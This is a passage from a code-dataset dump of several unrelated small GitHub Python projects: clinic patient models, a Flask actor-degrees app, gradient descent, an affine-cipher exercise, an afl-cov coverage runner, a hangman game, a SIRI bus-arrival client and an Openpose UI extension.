db.Column(db.String(255), nullable=False,\n default=\"No informado\")\n phone = db.relationship(\n \"PatientPhone\",\n back_populates=\"patient\",\n uselist=False,\n lazy=\"joined\",\n cascade=\"all, delete-orphan\",\n )\n address = db.relationship(\n \"PatientAddress\",\n back_populates=\"patient\",\n uselist=False,\n lazy=\"joined\",\n cascade=\"all, delete-orphan\",\n )\n medical_records = db.relationship(\n \"MedicalRecords\",\n backref=\"patient\",\n lazy=\"joined\",\n cascade=\"all, delete-orphan\",\n )\n clinical_care = db.relationship(\n \"ClinicCare\",\n back_populates=\"patient\",\n lazy=\"joined\",\n cascade=\"all, delete-orphan\",\n )\n created_at = db.Column(\n db.DateTime, default=datetime.now, server_default=db.func.now()\n )\n updated_at = db.Column(\n db.DateTime, onupdate=datetime.now, server_default=db.func.now()\n )\n\n @property\n def age(self):\n if self.birtday:\n birth_date = datetime.strptime(self.birtday, \"%Y-%m-%d\")\n today = datetime.now()\n age = (\n today.year\n - birth_date.year\n - ((today.month, today.day) < (birth_date.month, birth_date.day))\n )\n return age\n return None\n\n @property\n def format_patient_reference_phone(self):\n return f\"({self.reference_telephone[:3]}) {self.reference_telephone[3:7]}-{self.reference_telephone[7:]}\"\n\n @property\n def formatted_created_at(self):\n return (\n self.created_at.strftime(\n \"%d/%m/%Y %H:%M:%S\") if self.created_at else None\n )\n\n @property\n def formatted_updated_at(self):\n return (\n self.updated_at.strftime(\n \"%d/%m/%Y %H:%M:%S\") if self.updated_at else None\n )\n\n def __str__(self):\n return self.firstname\n\n\nclass PatientPhone(db.Model):\n __tablename__ = \"patient_phone\"\n id = db.Column(db.Integer, primary_key=True)\n phone = db.Column(db.String(14), default=\"000\")\n patient_id = db.Column(db.ForeignKey(\"patient.id\"), nullable=False)\n patient = db.relationship(\"Patient\", back_populates=\"phone\")\n\n def __str__(self):\n return self.phone\n\n @property\n def format_patient_phone(self):\n return f\"({self.phone[:3]}) {self.phone[3:7]}-{self.phone[7:]}\"\n\n\nclass PatientAddress(db.Model):\n __tablename__ = \"patient_address\"\n id = db.Column(db.Integer, primary_key=True)\n address = db.Column(db.String(255), nullable=False)\n number = db.Column(db.String(10), nullable=False)\n complement = db.Column(db.String(45), nullable=False, default=\"Não\")\n neighborhood = db.Column(db.String(45), nullable=False)\n city = db.Column(db.String(45), nullable=False)\n state = db.Column(db.String(45), nullable=False)\n patient_id = db.Column(db.ForeignKey(\"patient.id\"), nullable=False)\n patient = db.relationship(\"Patient\", back_populates=\"address\")\n\n def __str__(self):\n return self.address\n","repo_name":"IgorStrauss/control-clinic","sub_path":"control_clinic/models/patients.py","file_name":"patients.py","file_ext":"py","file_size_in_byte":4669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29013695325","text":"from flask import Flask, Markup, render_template, request\nfrom processing import confirm, display_result, person_id_for_name\n\napp = Flask(__name__, static_url_path='/static')\napp.config[\"DEBUG\"] = True\n\n@app.route('/degrees', methods=[\"GET\", \"POST\"])\ndef adder_page():\n confirmation = \"\"\n errors = \"\"\n\n if request.method == \"POST\":\n\n source = None\n target = None\n\n if request.form[\"action\"] == \"Find degrees\":\n actor1 = str(request.form[\"actor-one\"])\n actor2 = str(request.form[\"actor-two\"])\n try:\n source = person_id_for_name(actor1)\n target = person_id_for_name(actor2)\n\n if source is None:\n confirmation = \"\"\n errors += \"{!r} was not found.\".format(request.form[\"actor-one\"])\n elif target is None:\n confirmation = \"\"\n errors += \"{!r} was not found.\".format(request.form[\"actor-two\"])\n elif ((len(source) > 20) and (source != None) and (target != None)):\n confirmation = Markup(source)\n source = None\n if (len(target) > 15):\n confirmation2 = Markup(target)\n source = None\n return render_template('confirmations.html',\n confirmation1=confirmation, confirmation2=confirmation2,\n errors=errors, number=\"3\", actor1=actor1, actor2=actor2,\n confirmed1=\"confirmed-id1\", confirmed2=\"confirmed-id2\")\n else:\n return render_template('confirmation.html',\n confirmation=confirmation, errors=errors, number=\"1\",\n actor1=actor1, actor2=actor2, confirmed=\"confirmed-id1\")\n\n elif ((len(target) > 20) and (target != None) and (source != None)):\n confirmation = Markup(target)\n target = None\n return render_template('confirmation.html',\n confirmation=confirmation, errors=errors, number=\"2\",\n actor1=actor1, actor2=actor2, confirmed=\"confirmed-id2\")\n\n except:\n confirmation = \"\"\n errors += \"Not a valid entry\"\n\n else:\n actor1 = request.form[\"actor-one\"]\n actor2 = request.form[\"actor-two\"]\n duplicate = request.form[\"duplicate\"]\n\n if (duplicate == \"1\"):\n actor_id = str(request.form[\"confirmed-id1\"])\n source = confirm(request.form[\"actor-one\"], actor_id)\n if source is None:\n errors += \"{!r} was not found.\".format(request.form[\"actor-one\"])\n target = person_id_for_name(actor2)\n elif (duplicate == \"2\"):\n actor_id = str(request.form[\"confirmed-id2\"])\n target = confirm(actor2, actor_id)\n if target is None:\n errors += \"{!r} was not found.\".format(request.form[\"actor-two\"])\n source = person_id_for_name(actor1)\n else:\n actor_id1 = str(request.form[\"confirmed-id1\"])\n actor_id2 = str(request.form[\"confirmed-id2\"])\n source = confirm(actor1, actor_id1)\n target = confirm(actor2, actor_id2)\n if source is None:\n errors += \"{!r} was not found.\".format(request.form[\"actor-one\"])\n if target is None:\n errors += \"{!r} was not found.\".format(request.form[\"actor-two\"])\n\n if source is not None and target is not None:\n result = display_result(source, target)\n value = Markup(result)\n return render_template('result.html', result=value)\n return render_template('index.html', confirmation=confirmation, errors=errors)\n\nif __name__==\"__main__\":\n app.run()\n","repo_name":"nmsulliv/degrees-of-separation","sub_path":"mysite/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25505155308","text":"import numpy as np\n \ndef min_gd(fun,x0,grad,args=()):\n alpha=0.3\n beta=0.8\n x=x0\n #cnt=1\n while(np.linalg.norm(grad(x,*args))>0.00001):\n dir=(-1)*grad(x,*args)\n t=1\n while(fun(x+t*dir,*args)>=(fun(x,*args)+(-1)*alpha*t*(np.linalg.norm(grad(x,*args))**2))):\n t=t*beta\n #print(\"iteration\",cnt,\"t=\",t)\n x=x+t*dir\n #cnt=cnt+1\n return x","repo_name":"gpustat/Convex_optimization","sub_path":"projects/backtracking line search/gradient_descent_smp4.py","file_name":"gradient_descent_smp4.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2180652110","text":"# Pranav Salunke\nraise NotImplementedError(\"affineMatrix has not been completed yet. I am working on it! I will update the repository when it is completed!\")\nimport numpy as np\n\n\ndef bruteForceInverse(a, m):\n for i in range(1, m):\n if (a * i) % m == 1:\n return i\n return None\n\n\ndef matrixToNumString(matrix):\n s = \"\"\n for a, b in zip(matrix[0], matrix[1]):\n s += \" \"\n s += str(a)\n s += \" \"\n s += str(b)\n s = s.strip()\n return s\n\n\ndef numStringToText(alphabet, numstring):\n s = \"\"\n numarr = numstring.split()\n for n in numarr:\n s += alphabet[int(n)]\n return s\n\n\ndef textStringToMatrix(alphabet, string):\n top = []\n bottom = []\n for i in range(len(string)):\n n = alphabet.find(string[i])\n if i % 2 == 0:\n top.append(n)\n else:\n bottom.append(n)\n\n if len(top) > len(bottom):\n n = alphabet.find(\" \")\n bottom.append(n)\n\n return np.array([top, bottom])\n\n\ndef flippityFlopPart(matrix):\n a = matrix[0][0]\n b = matrix[0][1]\n c = matrix[1][0]\n d = matrix[1][1]\n\n t = a\n a = d\n d = t\n\n b = -b\n c = -c\n return np.array([[a, b], [c, d]])\n\n\ndef main():\n e1 = 0\n e2 = 0\n e3 = 0\n e4 = 0\n alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ ,.?\"\n # from hw question 5.2\n text = \"U?DIPPWKCKIKFBWZERRXTV AXN,FG.SAYCHYVTMIMBG.LHTV KCPEAF?.FSGGZ.YOQMZQL.DWKLHYCHIVT,REEKQMJSLEAFXWWVFMKQQUQEWOQHI .BOG.UN.JGNIZQYESRMOQGNWMTVZHF,OKQYZQBLVNQ.MJSLMKQQUQRXKMJEG.ZH WRM.HYNDV,REE,RGBJR.F?NFHMHGHSFMKTZPDKA?EVJEM W?T MDOYU.FSFYCKWSHKNGEG.LH?NFHMHGHSFOQCCESRM?N,RZBE,.HZZQLIHWWCZ.KHIIJOWIHW..HQQUQUNRMJR.F?TWANUEGSEGTSHFXWZGHDOOQGNVFMKWE,MBFE,.H,XOQWKZBOTRZON.ECJQLWZFXWZQQUQ.GMZCIG.VZKWV.Q.NXVTG.QQUQ.USFMKBOBFEM WYCHIVTJR.FJLVZGNMJSL?Z QIOWCESRMSFSWSEYRWK\"\n # from example 5.4\n # text = \"CU.TG CGNFCG.?BK\"\n C = textStringToMatrix(alphabet, text)\n\n for e1 in range(2): # test all 16 cases\n for e2 in range(2):\n for e3 in range(2):\n for e4 in range(2):\n # get matrix A for that case\n # for text from hw question 5.2\n A = np.array([[14 + (15 * e1), 5 + (15 * e2)], [3 + (15 * e3), 11 + (15 * e4)]])\n # from example 5.4\n # A = np.array([[9 + (15 * e1), 1 + (15 * e2)], [13 + (15 * e3), 4 + (15 * e4)]])\n\n # get det A to see if it is invertable in mod 30 (30 is hard coded for now)\n det = int(round(np.linalg.det(A)))\n det = det % 30\n detinv = bruteForceInverse(det, 30)\n if detinv is not None:\n print(\"%d %d %d %d\" % (e1, e2, e3, e4))\n Achanged = flippityFlopPart(A)\n Ainv = (detinv * Achanged) % 30 # find A^-1\n P = (Ainv.dot(C)) % 30 # get matrix for plain text\n s = matrixToNumString(P)\n print(numStringToText(alphabet, s)) # convert number matrix to string\n\n\nmain()\n","repo_name":"PranavSalunke/Cryptography-Systems","sub_path":"affineMatrix.py","file_name":"affineMatrix.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39832323869","text":"#!/usr/bin/env python3.7\nimport logging\nimport subprocess\nimport threading\nimport argparse\nimport sys\nimport socketserver\nimport os\nfrom glob import glob\nfrom time import sleep\nfrom functools import partial\nfrom utils import *\n\n# TODO how to properly manage loggers without messing with the root logger?\nlogging.basicConfig(level=logging.WARNING, format=\"%(asctime)s | %(name)s | %(message)s\",\n datefmt='%Y-%d-%m %H:%M:%S')\n\n\ndef start_cov_and_serve(target_cmd: str, fuzz_out_dir: str, cov_dir: str, web_port: int):\n \"\"\"\n Starts threads for afl-cov and python http.server\n :param target_cmd: Command-line to start the target program\n :param fuzz_out_dir: Absolute path of directory passed to afl-fuzz -o switch\n :param cov_dir: Absolute path to project root of the coverage build\n :param web_port: Port to serve the web report on\n :return: None\n \"\"\"\n threads = list()\n\n # Start http.server\n srv_thread = threading.Thread(target=run_webserver, args=(fuzz_out_dir, web_port))\n srv_thread.start()\n threads.append(srv_thread)\n\n # Start afl-cov\n cov_thread = threading.Thread(target=run_afl_cov, args=(target_cmd, fuzz_out_dir, cov_dir))\n cov_thread.start()\n threads.append(cov_thread)\n\n # Once the afl-cov thread exits, we assume something has gone wrong or that the\n # user wants to exit\n for t in threads:\n t.join()\n\n\ndef run_afl_cov(target_cmdline: list, fuzz_out_dir: str, cov_dir: str):\n logger = logging.getLogger('AFL-COV')\n logger.warning(f\"Starting afl-cov\")\n\n # Create a cmdline string that contains the full path to the bin\n bin_path = os.path.realpath(os.path.join(cov_dir, target_cmdline[0]))\n tgt_cmd = f'{bin_path} {\" \".join(target_cmdline[1:])}'\n if '@@' in tgt_cmd:\n # afl-cov uses \"AFL_FILE\" instead of \"@@\"\n tgt_cmd = tgt_cmd.replace('@@', 'AFL_FILE')\n else:\n # handle cases where the bin reads from stdin\n tgt_cmd = f'cat AFL_FILE | {tgt_cmd}'\n\n cov_args = ['/usr/bin/afl-cov', '-d', fuzz_out_dir, '--live', '--overwrite', '--lcov-web-all', '--coverage-cmd', tgt_cmd, '--code-dir', cov_dir]\n proc = subprocess.Popen(cov_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n # Quick check to see if we immediately died for some reason\n try:\n dead = True\n proc.wait(3.0)\n except subprocess.TimeoutExpired:\n dead = False\n pass\n finally:\n if dead:\n outs, errs = proc.communicate(timeout=1)\n if outs:\n die(outs.decode())\n if errs:\n die(errs.decode())\n\n # Parse afl-cov output so we can log each message in blocks instead of line by line\n block = []\n found_coverage = False\n logger.warning('Collecting code coverage')\n #import pdb; pdb.set_trace()\n for line in iter(proc.stdout.readline, b\"\"):\n line = line.decode().strip()\n\n # Handle the various types of messages afl-cov logs\n if '[-]' in line:\n logger.debug(line.lstrip('[-] '))\n elif '[*]' in line:\n logger.warning(line.lstrip('[*] '))\n elif 'coverage' in line:\n if \"'line'\" in line:\n # Line coverage can be very verbose\n logger.debug(line)\n else:\n logger.info(line)\n else:\n logger.debug(line)\n\n # Check if anything went wrong\n proc.wait()\n if proc.returncode != 0:\n logger.critical(\"afl-cov returned non-zero exit code: %d\" % proc.returncode)\n logger.critical(\"Failed command: \" + ' '.join(proc.args))\n\n\ndef run_webserver(fuzz_out_dir, port):\n web_dir = f'{fuzz_out_dir}/cov/web'\n handler_class = partial(RequestHandler, directory=web_dir)\n socketserver.TCPServer.allow_reuse_address = True\n\n logger = logging.getLogger('WEB-SRV')\n logger.debug(f'Web directory is set to {web_dir}')\n logger.warning('Waiting for web report to be created...')\n\n # We need to hang out until the web report exists\n while not os.path.exists(f'{web_dir}/index.html'):\n sleep(1)\n\n with socketserver.TCPServer(('0.0.0.0', port), handler_class) as httpd:\n logger.warning('Web report created. Serving on port %d' % port)\n httpd.serve_forever()\n\n\ndef init_parser(add_help=True):\n parser = argparse.ArgumentParser(description='Run afl-cov and serve the web report', add_help=add_help)\n parser.add_argument('--cov-dir', default='./*-cov',\n help='absolute path to the dir containing the coverage build')\n parser.add_argument('--port', type=int, default=8000,\n help='port on which to serve the web report')\n parser.add_argument('--exec', dest='cmdline', metavar='target_cmdline', nargs='*',\n required=True, help='./relative_path/the_bin -a arg @@')\n\n return parser\n\n\ndef validate_args(args):\n try: \n args.cov_dir = resolve_glob(args.cov_dir)\n args.cov_cmdline = resolve_cmdline_path(args.cov_dir, args.cmdline)\n except FileNotFoundError as e:\n die(e)\n\n\nif __name__ == \"__main__\":\n parser = init_parser()\n\n # Add args that conflict with afl-fuzz runner script\n parser.add_argument('-o', default='/fuzz_out',\n help='absolute path to the fuzzer output directory')\n parser.add_argument(\"-v\", action=\"count\", help=\"increase output verbosity\")\n args = parser.parse_args()\n\n validate_args(args)\n\n # Set root logger level (default = WARN, -v = INFO, -vv+ = DEBUG)\n if not args.v:\n level = logging.WARN\n elif args.v == 1:\n level = logging.INFO\n else:\n level = logging.DEBUG\n\n logging.getLogger().setLevel(level)\n\n # Start up afl-cov and serve the web report\n start_cov_and_serve(args.cov_cmdline, args.fuzz_out, args.cov_dir, args.port)\n","repo_name":"dlmarrero/sweet-fuzz","sub_path":"src/covrunner.py","file_name":"covrunner.py","file_ext":"py","file_size_in_byte":5840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18686373690","text":"import bottle\nimport model\n\nvislice = model.Vislice('stanje.json')\n\nvislice = model.Vislice()\n#id = vislice.nova_igra()\n#igra, stanje = vislice.igre[id]\n#vislice.ugibaj(id, 'A')\n#vislice.ugibaj(id, 'K')\n#vislice.ugibaj(id, 'U')\n#vislice.ugibaj(id, 'L')\n\n\n@bottle.get('/')\ndef index():\n return bottle.template('index.tpl') \n\n\n#@bottle.get('/igra/')\n#def testigra():\n# return bottle.template('igra.html', id_igre=id, igra=igra, stanje=stanje) S TEM SMO SE NEKAJ IGRALI\n\n#v brskalnik napisemo localhost:8080 in tam je igrica\n#ta funkcija pove da na nekih rootih(/) prikaze slikico:\n\n@bottle.get('/img/')\ndef slike(ime):\n return bottle.static_file(ime, root = 'img') \n\n@bottle.post('/nova_igra/') #delamo piškotek\ndef nova_igra_2():\n id_igre = vislice.nova_igra()\n bottle.response.set_cookie('id_igre', str(id_igre), path='/')\n bottle.redirect('/igra/')\n\n@bottle.get('/igra/')\ndef pokazi_igro_2():\n id_igre = int(bottle.request.get_cookie('id_igre'))\n igra, stanje = vislice.igre[id_igre]\n return bottle.template('igra.html', id_igre=id_igre, igra=igra, stanje=stanje)\n\n@bottle.post('/igra/')\ndef ugibaj_2():\n id_igre = int(bottle.request.get_cookie('id_igre'))\n crka = bottle.request.forms.getunicode('crka')\n vislice.ugibaj(id_igre, crka)\n bottle.redirect('/igra/')\n print(crka)\n#post spreminja stanje, get pa ne\nbottle.run(reloader=True, debug=True)\n\n\n\n\n\n","repo_name":"reginab98/Vislice","sub_path":"vislice.py","file_name":"vislice.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1399155933","text":"\"siri.py: Basic implementation of a SIRI-SM client, with Israel Ministry of Transportation quirks\"\n# Copyright (C) 2016, 2018 Elad Alfassa \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n# SPDX-License-Identifier: GPL-3.0-or-later\n\nfrom typing import Dict, List\nimport aiohttp\nimport dateutil.parser\nimport dateutil.tz\nimport json\nimport time\nfrom aiocache import SimpleMemoryCache\nfrom aiocache.base import BaseCache\nfrom itertools import zip_longest\nGROUP_SIZE = 120\n\nURL = None\n\n\ndef _listify(obj):\n \"\"\" Wrap the object in a list if it's not a list \"\"\"\n if isinstance(obj, list):\n return obj\n else:\n return [obj]\n\n\ndef _grouper(iterable, n, fillvalue=None):\n \"Collect data into fixed-length chunks or blocks\"\n # From itertools recipies: https://docs.python.org/3/library/itertools.html\n # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx\"\n args = [iter(iterable)] * n\n return zip_longest(*args, fillvalue=fillvalue)\n\n\nclass SIRIResponse(object):\n def __init__(self, json_response: Dict, stop_codes: List[str], verbose=False):\n if verbose:\n print(json.dumps(json_response, indent=2))\n\n self.visits: Dict[str, List[SIRIStopVisit]] = {}\n \"\"\" Stop visits. A dictionary in the form of {stop_code: SIRIStopVisit} \"\"\"\n self.errors: List[str] = []\n \"\"\" Errors, if any\"\"\"\n\n for stop_code in stop_codes:\n self.visits[str(stop_code)] = []\n\n # ew.\n try:\n response = json_response['Siri']['ServiceDelivery']\n except KeyError:\n print(json.dumps(json_response, indent=2))\n raise\n\n self.timestamp = response['ResponseTimestamp']\n \"\"\" Timestamp of the response from the server \"\"\"\n\n if 'StopMonitoringDelivery' in response:\n for delivery in _listify(response['StopMonitoringDelivery']):\n if delivery['Status'] != \"true\":\n # TODO actually log errors!\n self.errors.append(delivery['ErrorCondition']['Description'])\n elif 'MonitoredStopVisit' in delivery:\n for visit in _listify(delivery['MonitoredStopVisit']):\n stop_visit = SIRIStopVisit(visit)\n self.visits[stop_visit.stop_code].append(stop_visit)\n\n def to_dict(self) -> dict:\n \"\"\" Serialize to a dict format which is more readable than the original source \"\"\"\n visits = {k: [visit.to_dict() for visit in v] for k, v in self.visits.items()}\n return {\"errors\": self.errors if len(self.errors) > 0 else None,\n \"timestamp\": str(self.timestamp),\n \"visits\": visits}\n\n def append(self, other):\n \"\"\" Append visits and error from a different response into this response \"\"\"\n if not isinstance(other, SIRIResponse):\n raise TypeError(\"Expected a SIRIResponse object\")\n self.errors += other.errors\n for stop_code, visits in other.visits.items():\n if stop_code in self.visits:\n for visit in visits:\n if not any(my_visit == visit for my_visit in self.visits[stop_code]):\n # a new visit! let's apped it\n self.visits[stop_code].append(visit)\n else:\n self.visits[stop_code] = visits\n\n\nclass CachedSIRIResponse(SIRIResponse):\n \"\"\" a SIRI response that was taken entirely from the cache \"\"\"\n def __init__(self, visits):\n self.errors = []\n self.visits: Dict[str, List[SIRIStopVisit]] = visits\n self.timestamp = None\n\n # find a timestamp in one of the stops in this cache entry:\n for stop_visits in visits.values():\n if len(stop_visits) > 0:\n self.timestamp = stop_visits[0].timestamp\n break\n\n\nclass SIRIClient(object):\n \"\"\" SIRI-SM client using aiohttp \"\"\"\n def __init__(self, url: str, user_id: str, cache: BaseCache = None,\n cache_ttl: int = 30, verbose: bool = False):\n self.url = url\n self.user_id = user_id\n self.verbose = verbose\n self.cache_ttl = cache_ttl\n self._cache = cache if cache is not None else SimpleMemoryCache()\n self._connector = None\n\n async def request(self, stop_codes: List[str], max_visits: int = 50) -> SIRIResponse:\n \"\"\" Request real time information for stops in `stop_codes` \"\"\"\n # Look for stop_codes in cache\n to_request = []\n from_cache = []\n for stop in stop_codes:\n cached = await self._cache.get(f\"realtime:{stop}\")\n if cached is None:\n to_request.append(stop)\n else:\n from_cache.append((stop, cached))\n\n headers = {'Accept': 'application/json',\n 'Accpet-Encoding': 'gzip,deflate'}\n async with aiohttp.ClientSession() as session:\n ret = None\n for group in _grouper(to_request, GROUP_SIZE):\n group = list(filter(None, group))\n params = {\n \"Key\": self.user_id,\n \"MonitoringRef\": ','.join(group),\n }\n async with session.get(self.url, params=params, headers=headers) as raw_response:\n try:\n json_response = await raw_response.json(encoding=\"utf-8\")\n except UnicodeDecodeError:\n json_response = await raw_response.json()\n except aiohttp.ContentTypeError as e:\n print('Content type error', e)\n print(await raw_response.text())\n raise e\n\n response = SIRIResponse(json_response, group, self.verbose)\n if ret:\n # Merge SIRIResponse objects if we have more than\n # one group\n if response.errors:\n print(response.errors)\n ret.append(response)\n else:\n ret = response\n if ret is not None:\n # cache new visits\n for stop_code, visits in ret.visits.items():\n await self._cache.set(f\"realtime:{stop_code}\", visits, ttl=self.cache_ttl)\n # add cached visits to the response\n for stop_code, visits in from_cache:\n ret.visits[stop_code] = visits\n else:\n ret = CachedSIRIResponse(dict(from_cache))\n return ret\n\n\nclass SIRIStopVisit(object):\n def __init__(self, src):\n self._src = src\n self.producer = 'SIRI'\n\n self.timestamp = dateutil.parser.parse(src['RecordedAtTime'])\n \"\"\" RecordedAtTime from the SIRI response, ie. the timestamp in which the prediction was made \"\"\"\n\n self.stop_code = src['MonitoringRef']\n \"\"\" The stop code for this stop visit \"\"\"\n\n journey = src['MonitoredVehicleJourney']\n self.line_id = journey['LineRef']\n \"\"\" Matches the route_id from the GTFS file \"\"\"\n\n self.route_id = self.line_id\n \"\"\" line ref or line id is SIRI terminology, route_id is GTFS terminology. We support both. route_id is identical to line_id \"\"\"\n\n self.direction_id = journey['DirectionRef']\n \"\"\" Direction code for this trip \"\"\"\n\n self.line_name = journey['PublishedLineName']\n \"\"\" PublishedLineName. The meaning of this number is unclear for Israel Railways data \"\"\"\n\n self.operator_id = journey['OperatorRef']\n \"\"\" oprator / agency ID of this route. \"\"\"\n\n self.destination_id = journey['DestinationRef']\n \"\"\" The stop code of this trip's destination \"\"\"\n\n try:\n vehicle_ref = journey['VehicleRef']\n except KeyError:\n vehicle_ref = None\n self.vehicle_ref = vehicle_ref\n \"\"\" In case of Israel Railways, this is the train number and is guranteed to be unique per day\n For buses, this is either the license plate number, or the internal vehicle number \"\"\"\n\n # Assuming singular MonitoredCall object.\n # need to change that assumption if the \"onward calls\" feature of version 2.8 will ever be used\n call = journey['MonitoredCall']\n self.eta = dateutil.parser.parse(call['ExpectedArrivalTime'])\n \"\"\" Estimated time for arrival \"\"\"\n\n # Convert SIRI - style trip ID to GTFS style, to make it useful\n\n if 'FramedVehicleJourneyRef' in journey:\n journey_ref = journey['FramedVehicleJourneyRef']\n\n tripdate = dateutil.parser.parse(journey_ref['DataFrameRef'])\n tripdate = tripdate.strftime('%d%m%y')\n\n trip_id_part = journey_ref['DatedVehicleJourneyRef']\n\n trip_id = f\"{trip_id_part}_{tripdate}\"\n else:\n trip_id = None\n self.trip_id = trip_id\n \"\"\" Trip ID, unique identifier of this trip per day \"\"\"\n\n try:\n status = call['ArrivalStatus']\n except KeyError:\n status = None\n self.status = status\n \"\"\" Can be None, or a string: OnTime, early, delayed, cancelled, arrived, noReport. Only relevant for Israel Railways? \"\"\"\n\n self.departed = None\n \"\"\" The aimed departure time from the origin station. In some edge case, this is slightly different then the GTFS schedule \"\"\"\n\n if 'AimedDepartureTime' in call:\n self.departed = dateutil.parser.parse(call['AimedDepartureTime'])\n elif 'OriginAimedDepartureTime' in journey:\n self.departed = dateutil.parser.parse(journey['OriginAimedDepartureTime'])\n else:\n self.departed = None\n\n if \"VehicleLocation\" in journey:\n self.location = {'lat': journey[\"VehicleLocation\"][\"Latitude\"],\n 'lon': journey[\"VehicleLocation\"][\"Longitude\"]}\n else:\n self.location = None\n\n self.static_info = None\n \"\"\" Placeholder for plugging static GTFS schedule info \"\"\"\n\n def __repr__(self):\n return \"SIRIStopVisit \".format(self.line_id, self.eta)\n\n def __eq__(self, other):\n return (self.producer == other.producer\n and self.stop_code == other.stop_code\n and self.timestamp == other.timestamp\n and self.eta == other.eta\n and self.route_id == other.route_id\n and self.vehicle_ref == other.vehicle_ref\n and self.direction_id == other.direction_id)\n\n def to_dict(self) -> dict:\n ret = {}\n for key, value in self.__dict__.items():\n if key.startswith(\"_\"):\n continue\n if isinstance(value, (int, str, type(None), dict)):\n ret[key] = value\n elif callable(getattr(value, \"to_dict\", None)):\n ret[key] = value.to_dict()\n else:\n ret[key] = str(value)\n return ret\n","repo_name":"elad661/curlbus","sub_path":"curlbus/siri.py","file_name":"siri.py","file_ext":"py","file_size_in_byte":11592,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"40"} +{"seq_id":"7268800560","text":"import json\nimport os.path\nimport pathlib\nimport typing\nimport urllib.parse\n\nimport gradio as gr\n\n# Get the base directory of the extension\ntry:\n root_path = pathlib.Path(__file__).resolve().parents[1]\nexcept NameError:\n import inspect\n\n root_path = pathlib.Path(inspect.getfile(lambda: None)).resolve().parents[1]\n\n\ndef get_asset_url(\n file_path: pathlib.Path, append: typing.Optional[dict[str, str]] = None\n) -> str:\n \"\"\"Generate a URL with a query string to prevent caching.\"\"\"\n if append is None:\n append = {\"v\": str(os.path.getmtime(file_path))}\n else:\n append = append.copy()\n append[\"v\"] = str(os.path.getmtime(file_path))\n return f\"/file={file_path.absolute()}?{urllib.parse.urlencode(append)}\"\n\n\ndef write_config_file() -> pathlib.Path:\n \"\"\"Write configuration file to be passed in the iframe query string.\"\"\"\n # Models and poses\n assets = {\n \"models/hand.fbx\": get_asset_url(root_path / \"models\" / \"hand.fbx\"),\n \"models/foot.fbx\": get_asset_url(root_path / \"models\" / \"foot.fbx\"),\n \"src/poses/data.bin\": get_asset_url(root_path / \"src\" / \"poses\" / \"data.bin\"),\n }\n\n # MediaPipe Pose files\n MEDIAPIPE_POSE_VERSION = \"0.5.1675469404\"\n mediapipe_dir = root_path / \"downloads\" / \"pose\" / MEDIAPIPE_POSE_VERSION\n for file_name in [\n \"pose_landmark_full.tflite\",\n \"pose_web.binarypb\",\n \"pose_solution_packed_assets.data\",\n \"pose_solution_simd_wasm_bin.wasm\",\n \"pose_solution_packed_assets_loader.js\",\n \"pose_solution_simd_wasm_bin.js\",\n ]:\n file_path = mediapipe_dir / file_name\n if not file_path.exists():\n continue\n assets[file_name] = get_asset_url(file_path.absolute())\n\n # Write configuration file\n consts = {\"assets\": assets}\n config_dir = root_path / \"downloads\"\n config_dir.mkdir(mode=0o755, parents=True, exist_ok=True)\n config_path = config_dir / \"config.json\"\n config_path.write_text(json.dumps(consts))\n return config_path\n\n\ndef on_ui_tabs():\n \"\"\"WebUI callback: Create tab\"\"\"\n with gr.Blocks(analytics_enabled=False) as blocks:\n create_ui()\n return [(blocks, \"3D Openpose\", \"threedopenpose\")]\n\n\ndef create_ui():\n \"\"\"Create tab\"\"\"\n try:\n from modules.shared import opts\n\n use_online: bool = opts.openpose3d_use_online_version\n cn_max: int = opts.control_net_max_models_num\n except (ImportError, AttributeError):\n # Values when this script is run standalone or if controlnet is not installed\n cn_max = 0\n use_online = False\n\n if use_online:\n html_url = \"https://zhuyu1997.github.io/open-pose-editor/\"\n else:\n config = {\"config\": get_asset_url(write_config_file())}\n html_url = get_asset_url(root_path / \"pages\" / \"index.html\", config)\n\n with gr.Tabs(elem_id=\"openpose3d_main\"):\n with gr.Tab(label=\"Edit Openpose\"):\n gr.HTML(\n f\"\"\"\n \n \"\"\"\n )\n gr.Markdown(\n \"Online version: [Online 3D Openpose Editor](https://zhuyu1997.github.io/open-pose-editor/)\"\n )\n with gr.Tab(label=\"Send to ControlNet\"):\n with gr.Row():\n send_t2i = gr.Button(value=\"Send to txt2img\", variant=\"primary\")\n send_i2i = gr.Button(value=\"Send to img2img\", variant=\"primary\")\n with gr.Row():\n cn_dropdown_list = [str(i) for i in range(cn_max)]\n cn_dropdown_list.insert(0, \"-\")\n with gr.Column(variant=\"panel\"):\n pose_image = gr.Image(\n label=\"Pose\",\n elem_id=\"openpose3d_pose_image\",\n )\n with gr.Row():\n pose_target = gr.Dropdown(\n label=\"Control Model number\",\n choices=cn_dropdown_list,\n value=\"0\" if cn_max >= 1 else \"-\",\n )\n pose_download = gr.Button(value=\"Download\")\n with gr.Column(variant=\"panel\"):\n depth_image = gr.Image(\n label=\"Depth\",\n elem_id=\"openpose3d_depth_image\",\n )\n with gr.Row():\n depth_target = gr.Dropdown(\n label=\"Control Model number\",\n choices=cn_dropdown_list,\n value=\"1\" if cn_max >= 2 else \"-\",\n )\n 